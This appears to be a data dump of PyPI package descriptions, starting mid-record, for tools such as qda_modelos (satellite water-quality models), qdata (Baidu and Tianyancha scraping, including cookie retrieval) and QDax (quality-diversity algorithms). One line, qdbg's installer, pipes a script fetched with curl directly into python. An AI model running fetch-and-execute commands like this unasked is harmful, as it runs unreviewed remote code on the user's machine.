Those models are mathematical and statistical algorithms\nwhich can be used to predict different water quality indexes by\nanalyzing the water-leaving radiance measured at different bands of\nelectromagnetic spectrum by sensors onboard satellites.According to the literature there are different approaches used in\nbio-optical modeling since simple models, based on empirical and\nsemi-empirical relations, until most complexes models based on radiative\ntransfer theory.Currently, this project implements a library of empirical and\nsemi-empirical models which can be used to predict the concentration of\nchlorophyll-a, total suspended solids, water transparency, turbidity,\nphycocyanin and the detection of macrophytes in aquatic environments.All the original equations are adapted in order to be applied in images\ncollected by MSI (Multispectral Instrument) sensor onboardSentinel-2A\nand Sentinel-2B\nplatforms.Getting StartedThese instructions will get you a copy of the project up and running on\nyour local machine for development and testing purposes.TechnologiesTo execute this project, you\u2019ll need the following technologies:32- or 64-bit computerPython 3SetupThis repository can be used as a complementary library for a main\nproject and its modules can be used whenever they are necessary.To install the package and dependencies use the following command:pip install qda_modelosIn order to useqda_modelosin your project it\u2019s required to install\ntherasteriolibrary:pip install rasterioYou can install dependencies directly in your machine or in a virtual\nenvironment of your choice, such asVirtualEnvorConda.UsageThe following example implements the water quality index: turbidity.The chosen method ismiller_mckee_2004which expects satellite\nimages of 659nm wavelength.This example utilizes Sentinel-2 imagery of which the band 4 has the\ncentral wavelength (665 nm) closest to the models requirement.First, import the required packages and desired methods:importrasterioasriofromqda_modelos.total_suspended_solids_turbidityimportmiller_mckee_2004In this case, we chose the rasterio package to read and write.tifdata files.Set and open the respective satellite images required to analyze the\nindexes:reflectance_659nm_wavelength=rio.open(\"tests/assets/20m/B4_20m_20181224.tif\").read()Open the band image file and choose one or more methods to analyze\nthe desired index:meta=rio.open(\"tests/assets/20m/B4_20m_20181224.tif\").metameta.update(driver=\"GTiff\")meta.update(dtype=rio.float32)miller_mckee_2004=miller_mckee_2004(reflectance_659nm_wavelength)Create and save the new image generated by the respectives bands of\nthe chosen method:withrio.open(\"miller_mckee_2004.tif\",\"w\",**meta)asdist:dist.write(miller_mckee_2004.astype(rio.float32))The output is a.tiffile containing the processed image by the\nchosen method:ReservoirTestingThis repository implementations can be tested by runningpytestcommand.python3-mpytestContributingContributions are always welcome! 
To fix a bug or enhance an existing\nmodule, follow these steps:Fork the repoCreate a new branch (git checkout-bimprove-feature)Make the appropriate changes in the filesAdd changes to reflect the changes madeCommit your changes (git commit-am'Improve feature')Push to the branch (git push originimprove-feature)Create a Pull RequestWhile contributing, remember to add tests to the new developed methods.LinksA Comprehensive Review on Water Quality Parameters Estimation Using\nRemote Sensing\nTechniquesBio-optical Modeling and Remote Sensing of Inland\nWatersReferencesChlorophyll-aALLAN, M.G, HICKS, B.J., BRABYN, L. (2007). Remote sensing of the\nRotorua lakes for water quality. CBER Contract Report No.\u00a051, client\nreport prepared for Environment Bay of Plenty. Hamilton, New Zealand:\nCentre for Biodiversity and Ecology Research, Department of Biological\nSciences, School of Science and Engineering, The University of Waikato.CHAVULA, G.; BREZONIK, P.; THENKABAIL, P.; JOHNSON, T.; BAUER, M.\nEstimating chlorophyll concentration in Lake Malawi from MODIS satellite\nimagery. Physics and Chemistry of the Earth, Parts A/B/C, [s. l.], v.\n34, n.\u00a013\u201316, p.\u00a0755\u2013760, 2009.DALL\u2019OLMO, G.; GITELSON, A. A.; RUNDQUIST, D. C. Towards a unified\napproach for remote estimation of chlorophyll-a in both terrestrial\nvegetation and turbid productive waters. Geophysical Research Letters,\n[s. l.], v. 30, n.\u00a018, 2003.GITELSON, A. A.; SCHALLES, J. F. & HLADIK, C. M. Remote chlorophyll-a\nretrieval in turbid, productive estuaries: Chesapeake Bay case study,\nRemote Sensing of Environment, v. 109, p.\u00a0464 \u2013 472, 2007.GORDON, H. & MOREL, A. Remote Assessment of Ocean Color for\nInterpretation of Satellite Visible Imagery: A Review. Lecture Notes on\nCoastal and Estuarine Studies, v. 4, Springer Verlag, New York, 114\np.\u00a01983.GONS, H. J. Optical Teledetection of Chlorophyllain Turbid Inland\nWaters. Environmental Science & Technology, [s. l.], v. 33, n.\u00a07,\np.\u00a01127\u20131132, 1999.GOWER, J.; KING, S.; BORSTAD, G.; BROWN, L. Detection of intense\nplankton blooms using the 709\u2009nm band of the MERIS imaging spectrometer.\nInternational Journal of Remote Sensing, [s. l.], v. 26, n.\u00a09,\np.\u00a02005\u20132012, 2005.LE, C.; LI, Y.; ZHA, Y.; SUN, D.; HUANG, C.; LU, H. A four-band\nsemi-analytical model for estimating chlorophyll a in highly turbid\nlakes: The case of Taihu Lake, China. Remote Sensing of Environment, [s.\nl.], v. 113, n.\u00a06, p.\u00a01175\u20131182, 2009.MISHRA, S.; MISHRA, D. R. A novel model for remote estimation of\nchlorophyll-a concentration in turbid productive waters. Remote Sensing\nof Environment, v. 117, p.\u00a0394 - 406, 2012.RODRIGUES, T; ALC\u00c2NTARA, E; WATANABE, F; ROTTA, LUIZ; IMAI, N;\nCURTARELLI, M & BARBOSA, C. Compara\u00e7\u00e3o entre M\u00e9todos Emp\u00edricos para\nestimativa da concentra\u00e7\u00e3o de Clorofila-a em Reservat\u00f3rios em Cascata\n(Rio Tiet\u00ea, S\u00e3o Paulo), Revista Brasileira de Cartografia, v. 68,\np.\u00a0181-192, 2016.CyanobacteriaDASH, P., WALKER, N.D., MISHRA, D.R., HU, C., PINCKNEY, J.L., D\u2019SA,\nE.J., (2011). Estimation of cyanobacterial pigments in a freshwater lake\nusing OCM satellite data. Remote Sens. Environ. 115 (12), 3409-3423.SIMIS, S.G.H., PETERS, S.W.M., GONS, H.J., (2005). Remote sensing of the\ncyanobacterial pigment phycocyanin in turbid inland water. Limnol.\nOceanogr. 50, 237-245.WOZNIAK, M., BRADTKE, K.M., DARECKI, M., KREZEL, A., (2016). 
Empirical\nmodel for phycocyanin concentration estimation as an indicator of\ncyanobacterial bloom in the optically complex coastal waters of the\nBaltic Sea. Remote Sens. 8 (3), 212-234.MacrophytesHUETE, A. A comparison of vegetation indices over a global set of TM\nimages for EOS-MODIS. Remote Sensing of Environment, [s. l.], v. 59,\nn.\u00a03, p.\u00a0440\u2013451, 1997.TUCKER, C. J. Red and photographic infrared linear combinations for\nmonitoring vegetation. Remote Sensing of Environment, [s. l.], v. 8,\nn.\u00a02, p.\u00a0127\u2013150, 1979.VILLA, P.; LAINI, A.; BRESCIANI, M.; BOLPAGNI, R. A remote sensing\napproach to monitor the conservation status of lacustrine Phragmites\naustralis beds. Wetlands Ecology and Management, [s. l.], v. 21, n.\u00a06,\np.\u00a0399\u2013416, 2013.VILLA, P.; MOUSIVAND, A.; BRESCIANI, M. Aquatic vegetation indices\nassessment through radiative transfer modeling and linear mixture\nsimulation. International Journal of Applied Earth Observation and\nGeoinformation, [s. l.], v. 30, p.\u00a0113\u2013127, 2014.Total Suspended Solids and TurbidityDOXARAN, D.; FROIDEFOND, J.-M.; CASTAING, P. Remote-sensing reflectance\nof turbid sediment-dominated waters Reduction of sediment type\nvariations and changing illumination conditions effects by use of\nreflectance ratios. Applied Optics, [s. l.], v. 42, n.\u00a015, p.\u00a02623,\n2003.DOXARAN, D.; FROIDEFOND, J.-M.; CASTAING, P.; BABIN, M. Dynamics of the\nturbidity maximum zone in a macrotidal estuary (the Gironde, France):\nObservations from field and MODIS satellite data. Estuarine, Coastal and\nShelf Science, [s. l.], v. 81, n.\u00a03, p.\u00a0321\u2013332, 2009.LIU, C. D., HE, B. Y., LI, M. T., REN, X. X. (2006). Quantitative\nmodeling of suspended sediment in middle Changjiang river from MODIS.\nChinese Geographical Science, v. 16, pp.\u00a079\u201382.MILLER, R. L.; MCKEE, B. A. Using MODIS Terra 250 m imagery to map\nconcentrations of total suspended matter in coastal waters. Remote\nSensing of Environment, [s. l.], v. 93, n.\u00a01\u20132, p.\u00a0259\u2013266, 2004.TANG, S.; LAROUCHE, P.; NIEMI, A.; MICHEL, C. Regional algorithms for\nremote-sensing estimates of total suspended matter in the Beaufort Sea.\nInternational Journal of Remote Sensing, [s. l.], v. 34, n.\u00a019,\np.\u00a06562\u20136576, 2013.TARRANT, P. E.; AMACHER, J. A.; NEUER, S. Assessing the potential of\nMedium-Resolution Imaging Spectrometer (MERIS) and Moderate-Resolution\nImaging Spectroradiometer (MODIS) data for monitoring total suspended\nmatter in small and intermediate sized lakes and reservoirs. Water\nResources Research, [s. l.], v. 46, n.\u00a09, 2010.ZHANG, Y.; LIN, S.; LIU, J.; QIAN, X.; GE, Y. Time-series MODIS\nImage-based Retrieval and Distribution Analysis of Total Suspended\nMatter Concentrations in Lake Taihu (China). International Journal of\nEnvironmental Research and Public Health, [s. l.], v. 7, n.\u00a09,\np.\u00a03545\u20133560, 2010.Water TransparencyGIARDINO, C. et al.\u00a0(2001). Detecting chlorophyll, Secchi disk depth and\nsurface temperature in a sub-alpine lake using Landsat imagery. The\nScience of Total Environment, v. 268, pp.\u00a019-29.GUIMAR\u00c3ES, V. S. et al.\u00a0(2016). Desenvolvimento de modelo emp\u00edrico para\ndetermina\u00e7\u00e3o de transpar\u00eancia de Secchi na Lagoa da Concei\u00e7\u00e3o \u2013 SC, a\npartir de imagens multiespectrais do sensor Operational Land Imager\n(OLI) -Landsat-8. Anais do XXI Simp\u00f3sio Brasileiro de Recursos H\u00eddricos.H\u00c4RM\u00c4, P. 
et al.\u00a0(2001). Detecting chlorophyll, Secchi disk depth and\nsurface temperature in a sub-alpine lake using Landsat imagery. The\nScience of Total Environment, v. 268, pp.\u00a0107-121.Trophic State IndexLAMPARELLI, M.C. (2004) Grau de trofia em corpos d\u2019\u00e1gua do estado de S\u00e3o\nPaulo: avalia\u00e7\u00e3o dos m\u00e9todos de monitoramento. Thesis (Phd) \u2013 University\nof S\u00e3o Paulo, S\u00e3o Paulo.Reservoir Water Quality IndexQUALIDADE DE \u00c1GUA EM RESERVAT\u00d3RIOS\n(IQAR)Authors & ContributorsDeveloped by CERTI Foundation.This research was supported by FOZ DO CHAPEC\u00d3 ENERGIA S.A research and\ntechnological development program,through the PD-02949-2405/2019 project, regulated by Brazilian\nElectricity Regulatory Agency (ANEEL).LicenseThis repository is licensed under the terms of the BSD-style license."} +{"package": "qdarkgraystyle", "pacakge-description": "QDarkGray StylesheetA dark gray stylesheet for PyQt5 applications. This theme is a gray variation ofQDarkStyleSheettheme.InstallationInstallqdarkgraystylepackage using thesetupscript or usingpippythonsetup.pyinstallorpipinstallqdarkgraystyleThePySideandPyQt4support was dropped in version1.0.0. To useqdarkgraystylewithPySideorPyQt4or withPython 2.7, please use the version0.0.3.pipinstallqdarkgraystyle==0.0.3The support toPySide2will be add in future.UsageHere is an example using PyQt5.importsysimportqdarkgraystylefromPyQt5importQtGui# create the application and the main windowapp=QtGui.QApplication(sys.argv)window=QtGui.QMainWindow()# setup stylesheetapp.setStyleSheet(qdarkgraystyle.load_stylesheet())# runwindow.show()app.exec_()There is an example included in theexamplefolder.pythonexample/example_pyqt5.pyYou can run the script without installingqdarkgraystyle. 
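One caveat about the usage example above: it imports QApplication and QMainWindow from PyQt5.QtGui, but in PyQt5 these widget classes live in PyQt5.QtWidgets. A minimal working variant of the same example (assuming only that PyQt5 and qdarkgraystyle are installed) looks roughly like this:

```python
import sys

import qdarkgraystyle
from PyQt5 import QtWidgets

# create the application and the main window (QtWidgets, not QtGui, in PyQt5)
app = QtWidgets.QApplication(sys.argv)
window = QtWidgets.QMainWindow()

# apply the dark gray stylesheet
app.setStyleSheet(qdarkgraystyle.load_stylesheet())

# run
window.show()
sys.exit(app.exec_())
```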
You only need to have\nPyQt5 installed on your system.ContributeIssue Tracker:https://github.com/mstuttgart/qdarkgraystyle/issuesSource Code:https://github.com/mstuttgart/qdarkgraystyleSnapshotsHere are a few snapshots:Screenshot 1Screenshot 2Screenshot 3ContributingFork it (https://github.com/mstuttgart/qdarkgraystyle/fork)Create your feature branch (git checkout-bfeature/fooBar)Commit your changes (git commit-am'Add some fooBar')Push to the branch (git push origin feature/fooBar)Create a new Pull RequestCreditsThis package is totally based onQDarkStyleSheettheme created byColin Duquesnoy.Copyright (C) 2017-2018 by Michell Stuttgart"} +{"package": "qdash", "pacakge-description": "No description available on PyPI."} +{"package": "qdata", "pacakge-description": "Qdata - Python SDK for index and search\u4e3a\u4ec0\u4e48\u7ed9\u9879\u76ee\u6539\u4e86\u540d\u60f3\u505a\u4e00\u4e2a\u63d0\u4f9b\u66f4\u591a\u6570\u636e\u7684SDK\u5305,\u4f46\u4e0d\u4e00\u5b9a\u6709\u65f6\u95f4\u3002\u3002\u3002\u8001\u7684\u4ee3\u7801\u5305\u53ef\u4ee5\u5728old_baiduindex\u91cc\u627e\u5230\u4f1a\u6839\u636e\u6211\u81ea\u5df1\u4e2a\u4eba\u7684\u6570\u636e\u9700\u6c42\uff0c\u5f80\u91cc\u9762\u6dfb\u52a0\u4e0d\u540c\u7684\u6570\u636e\u6e90\uff0c\u5982\u679c\u6070\u597d\u5e2e\u52a9\u5230\u4f60\uff0c\u5f88\u5f00\u5fc3\u8001\u7684\u6570\u636e\u6e90\u4f1a\u5c3d\u529b\u7ef4\u62a4Data Sourcehttp://index.baidu.com/http://www.baidu.com/https://www.tianyancha.com/advance/searchInstallpipuninstallpycrypto# \u907f\u514d\u4e0epycryptodome\u51b2\u7a81pipinstall--upgradeqdataExamples\u767e\u5ea6\u6307\u6570./examples/test_baidu_index.py\u53ef\u4ee5\u53c2\u8003\u4ee5\u4e0b\u4ee3\u7801\u8fdb\u884c\u767e\u5ea6\u6307\u6570\u7684\u83b7\u53d6./examples/baidu_index_best_practice.py\u767e\u5ea6\u641c\u7d22./examples/test_baidu_search.py\u767e\u5ea6\u767b\u5f55(\u83b7\u53d6\u767e\u5ea6Cookie)./examples/test_baidu_login.py\u76ee\u524d\u53ea\u63d0\u4f9b\u4e8c\u7ef4\u7801\u767b\u5f55\uff0c\u5bc6\u7801\u8d26\u53f7\u767b\u5f55\u4e5f\u53ef\u4ee5\u505a\uff0c\u4f46\u4e0d\u505a\uff0c\u56e0\u4e3a\u6ca1\u5fc5\u8981\u3002\u5e78\u597d\u5de5\u4f5c\u4e0d\u505a\u722c\u866b\uff0c\u5fc3\u592a\u7d2f\u4e86\u3002\u5929\u773c\u67e5./examples/test_tianyancha.py\u8001\u5a46\u505a\u6c47\u62a5\u7740\u6025\u7528Changelog2021/03/25 \u4e0a\u7ebf2021/03/26 \u66f4\u65b0\u767e\u5ea6\u767b\u5f55\u529f\u80fd2021/04/07 \u767e\u5ea6\u6307\u6570\u65b0\u589e:\u5b9e\u65f6\u767e\u5ea6\u6307\u65702021/04/13 \u6dfb\u52a0\u5929\u773c\u67e5\u9ad8\u7ea7\u641c\u7d22\u516c\u53f8\u6570\u6570\u636e2021/05/18 \u4fee\u6b63\u6253\u5305\u95ee\u98982022/05/12 \u767e\u5ea6\u6307\u6570\u6dfb\u52a0Cipher-Text(\u4e0d\u786e\u5b9a\u90e8\u5206\u903b\u8f91)2022/05/16 \u4e00\u4e9b\u5c0f\u7684\u6539\u52a82022/05/30 \u4fee\u6b63\u767e\u5ea6\u6307\u6570\u52a0\u5bc6\u903b\u8f912022/09/06 \u6dfb\u52a0\u68c0\u67e5\u5173\u952e\u8bcd\u65b9\u6cd5\u3001\u6dfb\u52a0\u6700\u4f73\u5b9e\u8df5\u811a\u672cStargazers over time"} +{"package": "qdataclass", "pacakge-description": "No description available on PyPI."} +{"package": "qdatalib", "pacakge-description": "qdatalibNote this project is under development, and will undergo a massive number of breaking changes###TODObetter namingexport to csvbetter handling of not existing filesDescriptionQDataLib is a library of wrappers around some of the most useful \u201ddata\u201d-functions in QCoDeS. 
The Idea of QDataLib is to keep track of your data files using a MongoDB database, and ease the export to other file formats than SQLiteInstallationTo install QDataLib from source do the following:$gitclonehttps://github.com/qdev-dk/QDataLib.git\n$cdQDataLib\n$pipinstall.UsageseehereRunning the testsIf you have gotten 'qdatalib' from source, you may run the tests locally.Installqdatalibalong with its test dependencies into your virtual environment by executing the following in the root folder$pipinstall.\n$pipinstall-rtest_requirements.txtThen runpytestin thetestsfolder.Building the documentationIf you have gottenqdatalibfrom source, you may build the docs locally.Installqdatalibalong with its documentation dependencies into your virtual environment by executing the following in the root folder$pipinstall.\n$pipinstall-rdocs_requirements.txtYou also need to installpandoc. If you are usingconda, that can be achieved by$condainstallpandocelse, seeherefor pandoc's installation instructions.Then runmake htmlin thedocsfolder. The next time you build the documentation, remember to runmake cleanbefore you runmake html."} +{"package": "qdatamatrix", "pacakge-description": "QDataMatrixA PyQt4/PyQt5 widget for viewing and editing aDataMatrixobject.Sebastiaan Math\u00f4tCopyright 2016-2023https://pydatamatrix.eu/AboutTheqdatamatrixpackage provides a graphical widget to view and edit adatamatrixobject.DependenciesPython 2.7 or >= 3.4datamatrixqtpyUsageSeeexample.py, included with the source code.Licenseqdatamatrixis licensed under theGNU General Public License\nv3."} +{"package": "qdatastream", "pacakge-description": "pure python implementation for Qt\u2019s QDataStream"} +{"package": "qdatum", "pacakge-description": "UNKNOWN"} +{"package": "qdax", "pacakge-description": "QDax: Accelerated Quality-DiversityQDax is a tool to accelerate Quality-Diversity (QD) and neuro-evolution algorithms through hardware accelerators and massive parallelization. QD algorithms usually take days/weeks to run on large CPU clusters. With QDax, QD algorithms can now be run in minutes! \u23e9 \u23e9 \ud83d\udd5bQDax has been developed as a research framework: it is flexible and easy to extend and build on and can be used for any problem setting. Get started with simple example and run a QD algorithm in minutes here!QDaxpaperQDaxdocumentationInstallationQDax is available on PyPI and can be installed with:pipinstallqdaxAlternatively, the latest commit of QDax can be installed directly from source with:pipinstallgit+https://github.com/adaptive-intelligent-robotics/QDax.git@mainInstalling QDax viapipinstalls a CPU-only version of JAX by default. To use QDax with NVidia GPUs, you must first installCUDA, CuDNN, and JAX with GPU support.However, we also provide and recommend using either Docker or conda environments to use the repository which by default provides GPU support. Detailed steps to do so are available in thedocumentation.Basic API UsageFor a full and interactive example to see how QDax works, we recommend starting with the tutorial-styleColab notebook. 
It is an example of the MAP-Elites algorithm used to evolve a population of controllers on a chosen Brax environment (Walker by default).However, a summary of the main API usage is provided below:importjaximportfunctoolsfromqdax.core.map_elitesimportMAPElitesfromqdax.core.containers.mapelites_repertoireimportcompute_euclidean_centroidsfromqdax.tasks.armimportarm_scoring_functionfromqdax.core.emitters.mutation_operatorsimportisoline_variationfromqdax.core.emitters.standard_emittersimportMixingEmitterfromqdax.utils.metricsimportdefault_qd_metricsseed=42num_param_dimensions=100# num DoF arminit_batch_size=100batch_size=1024num_iterations=50grid_shape=(100,100)min_param=0.0max_param=1.0min_bd=0.0max_bd=1.0# Init a random keyrandom_key=jax.random.PRNGKey(seed)# Init population of controllersrandom_key,subkey=jax.random.split(random_key)init_variables=jax.random.uniform(subkey,shape=(init_batch_size,num_param_dimensions),minval=min_param,maxval=max_param,)# Define emittervariation_fn=functools.partial(isoline_variation,iso_sigma=0.05,line_sigma=0.1,minval=min_param,maxval=max_param,)mixing_emitter=MixingEmitter(mutation_fn=lambdax,y:(x,y),variation_fn=variation_fn,variation_percentage=1.0,batch_size=batch_size,)# Define a metrics functionmetrics_fn=functools.partial(default_qd_metrics,qd_offset=0.0,)# Instantiate MAP-Elitesmap_elites=MAPElites(scoring_function=arm_scoring_function,emitter=mixing_emitter,metrics_function=metrics_fn,)# Compute the centroidscentroids=compute_euclidean_centroids(grid_shape=grid_shape,minval=min_bd,maxval=max_bd,)# Initializes repertoire and emitter staterepertoire,emitter_state,random_key=map_elites.init(init_variables,centroids,random_key)# Run MAP-Elites loopforiinrange(num_iterations):(repertoire,emitter_state,metrics,random_key,)=map_elites.update(repertoire,emitter_state,random_key,)# Get contents of repertoirerepertoire.genotypes,repertoire.fitnesses,repertoire.descriptorsQDax core algorithmsQDax currently supports the following algorithms:AlgorithmExampleMAP-ElitesCVT MAP-ElitesPolicy Gradient Assisted MAP-Elites (PGA-ME)QDPGCMA-MEOMG-MEGACMA-MEGAMulti-Objective MAP-Elites (MOME)MAP-Elites Evolution Strategies (MEES)MAP-Elites PBT (ME-PBT)MAP-Elites Low-Spread (ME-LS)QDax baseline algorithmsThe QDax library also provides implementations for some useful baseline algorithms:AlgorithmExampleDIAYNDADSSMERLNSGA2SPEA2Population Based Training (PBT)QDax TasksThe QDax library also provides numerous implementations for several standard Quality-Diversity tasks.All those implementations, and their descriptions are provided in thetasks directory.ContributingIssues and contributions are welcome. Please refer to thecontribution guidein the documentation for more details.Related ProjectsEvoJAX: Hardware-Accelerated Neuroevolution. 
EvoJAX is a scalable, general purpose, hardware-accelerated neuroevolution toolkit.Paperevosax: JAX-Based Evolution StrategiesCiting QDaxIf you use QDax in your research and want to cite it in your work, please use:@misc{chalumeau2023qdax,\n title={QDax: A Library for Quality-Diversity and Population-based Algorithms with Hardware Acceleration},\n author={Felix Chalumeau and Bryan Lim and Raphael Boige and Maxime Allard and Luca Grillotti and Manon Flageat and Valentin Mac\u00e9 and Arthur Flajolet and Thomas Pierrot and Antoine Cully},\n year={2023},\n eprint={2308.03665},\n archivePrefix={arXiv},\n primaryClass={cs.AI}\n}ContributorsQDax was developed and is maintained by theAdaptive & Intelligent Robotics Lab (AIRL)andInstaDeep."} +{"package": "qdb", "pacakge-description": "UNKNOWN"} +{"package": "qdbase", "pacakge-description": "Example PackageThis is a highky opinionated framework for developing applications.I have been using bits and pieces of this for over two decades. This\nis a very early release of code that I am origanizing and documenting\nfor use by others."} +{"package": "qdbd", "pacakge-description": "# qdbd\nSQLAlchemy model generation from [QuickDBD][1] schema text.WIP[1]:https://www.quickdatabasediagrams.com/"} +{"package": "qdbg", "pacakge-description": "qdbgQuick debug tool - a general purpose CLI debugging utilityIntroductionEliminate the wasted clicks and keystrokes involved with copying your error messages into a search bar.qdbgdoes this tedious task for you (and we know you do it a lot :wink:). Simply run any command, and when your program inevitably fails,qdbgwill automatically open a search tab for you.qdbgIn the unlikely event that your program runs successfully,qdbgwill stay out of your way.RequirementsA developer that runs faulty programsPython 3.7+Linux or OSX operating systemA functioning web browserDependenciesqdbgis implemented only using the Python3 standard library. 
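To illustrate the behaviour described above, the same idea can be sketched with nothing but the standard library. This is an illustrative sketch only, not qdbg's actual internals; the function name, script name and search URL are assumptions:

```python
import subprocess
import sys
import urllib.parse
import webbrowser


def run_and_search(cmd):
    """Run *cmd*; if it fails, open a web search for the last error line.

    Illustrative sketch of the behaviour described for qdbg, not its real code.
    """
    # Capture stderr so the error text is available; stdout passes through untouched.
    proc = subprocess.run(cmd, stderr=subprocess.PIPE, text=True)
    if proc.returncode != 0 and proc.stderr.strip():
        # The last stderr line usually names the exception or error.
        query = proc.stderr.strip().splitlines()[-1]
        webbrowser.open("https://duckduckgo.com/?q=" + urllib.parse.quote(query))
    # Echo the captured error output so it is not lost.
    sys.stderr.write(proc.stderr or "")
    return proc.returncode


if __name__ == "__main__":
    # Usage: python qdbg_sketch.py <command> [args...]
    if len(sys.argv) < 2:
        sys.exit("usage: qdbg_sketch.py <command> [args...]")
    sys.exit(run_and_search(sys.argv[1:]))
```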
The package does have a few developer dependencies, includingpython-poetry, that are listed inpyproject.toml.InstallationOSX / Linux (recommended)curl-sSLhttps://raw.githubusercontent.com/hermgerm29/qdbg/main/get-qdbg.py|python-WindowsNot supported.PyPIqdbgis available on PyPI, but the recommended install method is preferred.Creditsqdbg's installation script is heavily derived frompython-poetry."} +{"package": "qdc-converter", "pacakge-description": "\u0420\u0443\u0441\u0441\u043a\u0438\u0439|EnglishQDC \u041a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440\u041a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440 *.qdc(Garmin QuickDraw Contours)\u0432 \u0442\u0430\u0431\u043b\u0438\u0446\u0443 *.csv(CSV \u0442\u0430\u0431\u043b\u0438\u0446\u0430)\u0438\u043b\u0438 *.grd(\u0420\u0430\u0441\u0442\u0440 ESRI ASCII Grid)\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043e\u0434\u043d\u0438\u043c \u0444\u0430\u0439\u043b\u043e\u043c\u0421\u043a\u0430\u0447\u0430\u0442\u044c\u0440\u0435\u043b\u0438\u0437.\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0438\u0437 PyPI# CLIpipinstallqdc-converter# CLI + GUIpipinstallqdc-converter[gui]\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0438\u0437 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044fgitclonehttps://github.com/interlark/qdc-convertercdqdc-converter\n\npython-mvenvvenv# Windows.\\venv\\Scripts\\activate.bat# Linux, MacOS.venv/bin/activate# CLIpipinstall.# CLI + GUIpipinstall.[gui]\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b:-i,-o\u0438-l.\u041f\u0440\u0438\u043c\u0435\u0440 \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u043f\u043a\u0438Contours\u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 *.qdc\u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0432 \u0442\u0430\u0431\u043b\u0438\u0446\u0443export_table.csv\u0441 3 \u043f\u043e\u043b\u044f\u043c\u0438X(\u0434\u043e\u043b\u0433\u043e\u0442\u0430 \u0432 \u0434\u0435\u0441\u044f\u0442\u0438\u0447\u043d\u044b\u0445 \u0433\u0440\u0430\u0434\u0443\u0441\u0430\u0445),Y(\u0448\u0438\u0440\u043e\u0442\u0430 \u0432 \u0434\u0435\u0441\u044f\u0442\u0438\u0447\u043d\u044b\u0445 \u0433\u0440\u0430\u0434\u0443\u0441\u0430\u0445)\u0438Depth(m)(\u0433\u043b\u0443\u0431\u0438\u043d\u0430 \u0432 \u043c\u0435\u0442\u0440\u0430\u0445), \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u043b\u043e\u0439 \u0434\u0430\u043d\u043d\u044b\u0445 L_1:qdc-converter -i \"Contours\" -o \"export_table.csv\" -l 1\u041f\u0440\u0438\u043c\u0435\u0440 \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u043f\u043a\u0438Contours\u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 *.qdc\u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0432 \u0440\u0430\u0441\u0442\u0440export_raster.grd, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u043b\u043e\u0439 \u0434\u0430\u043d\u043d\u044b\u0445 L_0:qdc-converter -i \"Contours\" -o \"export_raster.grd\" -l 0\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0440\u0430\u0441\u0442\u0440 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0435 \u0413\u0418\u0421 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, 
QGIS) \u0438 \u0441\u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u0431\u043e\u043b\u0435\u0435 \u0431\u044b\u0441\u0442\u0440\u043e\u0447\u0438\u0442\u0430\u0435\u043c\u044b\u0439 \u0444\u043e\u0440\u043c\u0430\u0442.\u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044bqdc-converter--helpUsage: qdc-converter [OPTIONS]\n\n QDC \u041a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440.\n\n \u041a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440 Garmin's QDC \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 CSV \u0438\u043b\u0438 GRD.\n\nOptions:\n \u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b: \u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440\u0430\n -i, --qdc-folder-path DIRECTORY\n \u041f\u0443\u0442\u044c \u0434\u043e \u043f\u0430\u043f\u043a\u0438 \u0441\u043e \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043a\u043e\u043d\u0442\u0443\u0440\u0430\u043c\u0438\n QuickDraw Contours (QDC). [required]\n\n -o, --output-path FILE \u041f\u0443\u0442\u044c \u0434\u043e \u0441\u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 (*.csv \u0438\u043b\u0438\n *.grd). [required]\n\n -l, --layer [0,1,2,3,4,5] \u0421\u043b\u043e\u0439 \u0434\u0430\u043d\u043d\u044b\u0445 (0 - Raw user data, 1 -\n Recommended). [0<=x<=5; required]\n \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0438: \u041a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0438\n -dx, --x-correction FLOAT \u041a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0430 X.\n -dy, --y-correction 